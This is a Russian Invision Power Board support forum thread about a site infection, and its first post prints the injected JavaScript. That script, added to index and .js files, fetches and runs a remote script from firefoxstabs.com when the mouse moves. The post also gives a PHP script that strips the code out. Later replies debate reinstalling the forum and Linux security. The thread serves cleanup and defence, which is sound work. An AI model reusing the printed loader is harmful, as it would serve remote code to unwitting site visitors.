вирус на FTP в index.* и *.JS файлах - Дизайн и модификация Invision Power Board

Перейти к содержимому

 

Правила раздела

Здесь обсуждаются вопросы по настройке и администрированию форумов IPB 3.x.
Пожалуйста, не оффтопьте, если зашли сюда случайно, и обратите внимание на соседние разделы.
Установка, настройка и обслуживание форумов IPB 2.x.
Оформление форумов, включая верстку скинов.
Размещение рекламы на форумах.
SEO оптимизация форума.
Техническая поддержка наших скинов и модов.

СвернутьПрикрепленные теги

Теги не найдены
Страница 1 из 1
  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

вирус на FTP в index.* и *.JS файлах <script type=" ... http://firefoxstabs.com/ ... </script

#1 Пользователь не на сайте   Qartvela™ »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Specialist
  • Сообщений: 135
  • Регистрация: 15-Февраль 11
  • Репутация: 17
  • IPB version:3.1.x
 

Отправлено 21 Май 2011 - 15:59

добавляется в конце файла index.* & *.JS
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>
document.write('<scr'+'ipt src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js\"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});


мне это помогло, поможет и вам. :)
удаляет из index.* & *.JS вредоносный код

1) просканировать компьютер на вирусы
2) обязательно смените пароль на FTP
3) загрузить firefoxtabs_remover.php на FTP и запустите _http://yourdomain/firefoxtabs_remover.php

<?php 
define ('BR', "<br />\r\n"); 
$srch='<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(\'http://firefoxstabs.com/\' + Math.random().toString().substring(3) + \'.js\', function() {flag = 2;});}});});</script>'; 
$srch2="document.write('<scr'+'ipt src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js\"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});"; 

function clean_file($file)
{ 
global $srch;
global $srch2; 
    $basename=basename($file); 
    $filename=substr($basename, 0, strrpos($basename, '.')); 
    //print($file.BR);
    
        $f_in=file_get_contents($file); 
        if (strpos($f_in, $srch)!=false) { 
  
              print("<b>".$file."</b><br>");
            $f_in=str_replace($srch, '', $f_in); 
            file_put_contents($file, $f_in); 
        } 
        if (strpos($f_in, $srch2)!=false) { 
        
            print("<b>".$file."</b><br>");
            
            $f_in=str_replace($srch2, '', $f_in); 
            file_put_contents($file, $f_in); 
        } 
    
} 

function firefoxtabs_remover($dir){ 
    if ($objs = glob($dir."/*")) { 
        foreach($objs as $obj) { 
            if (is_dir($obj)) firefoxtabs_remover($obj); 
            else clean_file($obj); 
        } 
    } 
} 

$dir=realpath('./'); 
firefoxtabs_remover($dir); 
?> 

Вложений


Сообщение изменено: Qartvela™ (21 Май 2011 - 16:06)

2

#2 Пользователь не на сайте   Fisana »

 
 
  • На PM не отвечаю
  • Смотреть блог
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 12 892
  • Регистрация: 21-Ноябрь 05
  • Репутация: 562
  • Откуда:Из интернетов
  • IPB version:3.1.x
 

Отправлено 21 Май 2011 - 17:15

Спасибо.
Тему закреплю пока. Уже обращались с такой проблемой.
0

#3 Пользователь не на сайте   Ritsuka »

 
 
  • Advanced
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 981
  • Регистрация: 08-Июнь 09
  • Репутация: 246
  • IPB version:3.2.x
 

Отправлено 21 Май 2011 - 18:36

А вообще, большинству будет достаточно просто перезалить дистрибутив форума. Если никаких "модов", основанных на правке файлов, не ставили. И просто, и быстро, и полезно :)
0

#4 Пользователь не на сайте   Qartvela™ »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Specialist
  • Сообщений: 135
  • Регистрация: 15-Февраль 11
  • Репутация: 17
  • IPB version:3.1.x
 

Отправлено 21 Май 2011 - 20:11

Просмотреть сообщениеRitsuka сказал(а):

И просто, и быстро, и полезно

перезалить дистрибутив форума? :D
1) просканировать компьютер на вирусы
2) обязательно смените пароль на FTP

это не нужно делать?

Просмотреть сообщениеRitsuka сказал(а):

достаточно просто перезалить дистрибутив форума

и это проще чем
3) загрузить firefoxtabs_remover.php на FTP и запустите _http://yourdomain/firefoxtabs_remover.php
:D
0

#5 Пользователь не на сайте   Ritsuka »

 
 
  • Advanced
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 981
  • Регистрация: 08-Июнь 09
  • Репутация: 246
  • IPB version:3.2.x
 

Отправлено 21 Май 2011 - 23:02

Конечно, проще. Запустите этот скрипт на форуме, где больше 100Мб аттачей и вы поймете, о чем я. Не говоря уже о форумах, где аттачей под 3Тб. Ваш скрипт загружает в память по очереди абсолютно все файлы из каталога, включая и бинарные аттачи, а затем выполняет поиск по их содержимому. Наверное, это модно - гонять ресурсы сервера впустую. Но простая перезаливка дистрибутива - куда экономнее и быстрее, если ваш форум хоть чуть-чуть крупнее пустого форума на localhost.

А от вирусов помогает Linux. Как и от воровства паролей.
0

#6 Пользователь не на сайте   muslimgauze »

 
 
  • Advanced
  • ***
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 509
  • Регистрация: 01-Май 10
  • Репутация: 6
  • IPB version:3.2.x
 

Отправлено 25 Май 2011 - 00:40

Просмотреть сообщениеRitsuka 21 Май 2011 - 23:02 сказал(а):

А от вирусов помогает Linux. Как и от воровства паролей.

увы, но это уже давно не так
да, чистых вирусов (работоспособных) под *nix нет, но зато есть МАССА эксплойтов!
да и никакой линукс не спасет от криворукости админа!
0

#7 Пользователь не на сайте   Ritsuka »

 
 
  • Advanced
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 981
  • Регистрация: 08-Июнь 09
  • Репутация: 246
  • IPB version:3.2.x
 

Отправлено 25 Май 2011 - 07:37

Цитата

да, чистых вирусов (работоспособных) под *nix нет, но зато есть МАССА эксплойтов!

99,9% этих "эксплоитов" заключаются в получении локальным пользователем root-привилегий. Если вы единственный пользователь ПК, и вы не запускаете на локали публичных вебсервисов (а еще лучше, сидите за файрволом) - вам на 99,99% ничего не грозит (а я в этой теме говорю именно о десктопе, откуда и была утечка ftp-паролей).

В самом linux проблем нет, проблемы бывают в дополнительном ПО. Но, во-первых, вероятность "удачного сочетания" уязвимого ПО + незакрытой дыры в ядре на отдельно взятой системе с не отключенными регулярными обновлениями стремится куда-то в сторону минус бесконечности. Во-вторых, у любого приличного дистрибутива есть своя система проверенных репозиториев/пакетов с проверкой и регулярными обновлениями.

Ну а если пользователь качает неизвестные бинарники и запускает их под рутом... Согласен, идиота ничто не спасет. Вспоминается текстовый вирус в стиле "привет, я вирус! пожалуйста, разошлите этот текст всем знакомым и самостоятельно отформатируйте жесткие диски".
0

#8 Пользователь не на сайте   muslimgauze »

 
 
  • Advanced
  • ***
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 509
  • Регистрация: 01-Май 10
  • Репутация: 6
  • IPB version:3.2.x
 

Отправлено 25 Май 2011 - 10:31

Просмотреть сообщениеRitsuka 25 Май 2011 - 07:37 сказал(а):

99,9% этих "эксплоитов" заключаются в получении локальным пользователем root-привилегий. Если вы единственный пользователь ПК, и вы не запускаете на локали публичных вебсервисов (а еще лучше, сидите за файрволом) - вам на 99,99% ничего не грозит (а я в этой теме говорю именно о десктопе, откуда и была утечка ftp-паролей).

В самом linux проблем нет, проблемы бывают в дополнительном ПО. Но, во-первых, вероятность "удачного сочетания" уязвимого ПО + незакрытой дыры в ядре на отдельно взятой системе с не отключенными регулярными обновлениями стремится куда-то в сторону минус бесконечности. Во-вторых, у любого приличного дистрибутива есть своя система проверенных репозиториев/пакетов с проверкой и регулярными обновлениями.

Ну а если пользователь качает неизвестные бинарники и запускает их под рутом... Согласен, идиота ничто не спасет. Вспоминается текстовый вирус в стиле "привет, я вирус! пожалуйста, разошлите этот текст всем знакомым и самостоятельно отформатируйте жесткие диски".


в 99% случаев "root-привилегии" получают УДАЛЕННЫЕ пользователи, не имеющие физического доступа у компу
учитывая, что линукс это ТОЛЬКО ядро, дыры есть и в нём, иначе не было бы патчей, исправляющих проблемы с безопасностью!
и никакая "своя система проверенных репозиториев/пакетов" не застрахована от ошибок и проблем

Сообщение изменено: muslimgauze (25 Май 2011 - 11:00)

0

#9 Пользователь не на сайте   Ritsuka »

 
 
  • Advanced
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 981
  • Регистрация: 08-Июнь 09
  • Репутация: 246
  • IPB version:3.2.x
 

Отправлено 25 Май 2011 - 14:03

Не буду более спорить, ибо оффтоп, да и ничего мы друг другу не докажем.
1

#10 Пользователь не на сайте   muslimgauze »

 
 
  • Advanced
  • ***
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 509
  • Регистрация: 01-Май 10
  • Репутация: 6
  • IPB version:3.2.x
 

Отправлено 25 Май 2011 - 17:19

Просмотреть сообщениеRitsuka 25 Май 2011 - 14:03 сказал(а):

Не буду более спорить, ибо оффтоп, да и ничего мы друг другу не докажем.

у меня опыта с кривыми руками и *nix лет так 10-12
0

#11 Пользователь не на сайте   Hymera »

 
 
  • Newbie
  • *
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 4
  • Регистрация: 13-Сентябрь 08
  • Репутация: 0
  • IPB version:2.2.1
 

Отправлено 02 Апрель 2012 - 13:21

А что делать, если яндекс ругается? Причем ему не нравятся именно файлы с базовыми скриптами движка? Там где графический редактор сообщений к примеру, или выпадающие меню? Хостеры не нашли никаких вирусов, посоветовали обращатся к разработчикам. Может у кого то еще такая проблема с 3.2.3?
0

#12 Пользователь не на сайте   siv1987 »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 1 351
  • Регистрация: 20-Март 09
  • Репутация: 212
  • IPB version:2.3.x
 

Отправлено 02 Апрель 2012 - 13:32

Если с скриптами все нормально и вы уверены что вирусов там нет, обращайтесь в яндекс.
0

#13 Пользователь не на сайте   Ph-A »

 
 
  • Advanced
  • Смотреть блог
  • Смотреть галерею
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 5 307
  • Регистрация: 18-Сентябрь 06
  • Репутация: 304
  • Откуда:Moscow
  • IPB version:3.1.x
 

Отправлено 02 Апрель 2012 - 17:54

Просмотреть сообщениеHymera сказал(а):

А что делать, если яндекс ругается?

Как показывает практика, Яндекс на вирусы ругается не просто так.

Просмотреть сообщениеHymera сказал(а):

Хостеры не нашли никаких вирусов

:) А как они искали?

Просмотреть сообщениеHymera сказал(а):

посоветовали обращатся к разработчикам.

Хороший совет.

Просмотреть сообщениеHymera сказал(а):

Может у кого то еще такая проблема с 3.2.3?

Такой проблемы нет. Но если вы скачали форум с помойки, то там будет любая зараза.
0

Сообщить об этой теме:


Страница 1 из 1
  • Вы не можете создавать новые темы
  • Вы не можете отвечать в этой теме

1 пользователей читают эту тему
0 зарегистрированных, 1 гостей, 0 скрытых


Контактная информация

Заказ дизайна форума

+7 (917) 501-4765
C 10 до 20 в рабочие дни (время московское)

Техническая поддержка

Контактные данные специалистов

Дизайн форумов

IPB 3.x ¦ IPB 2.x

Бесплатные шаблоны

IPB 3.2 – 3.3 ¦ IPB 3.1 ¦ IPB 3.0 ¦ IPB 2.2 – 2.3 ¦ IPB 2.1 ¦ Клипарт
Лицензия на использование ¦ Ваша поддержка ¦ О проекте
Copyright © 2005-2012 IPBSkins.ru Team
При копировании материалов с сайта
прямая ссылка на источник обязательна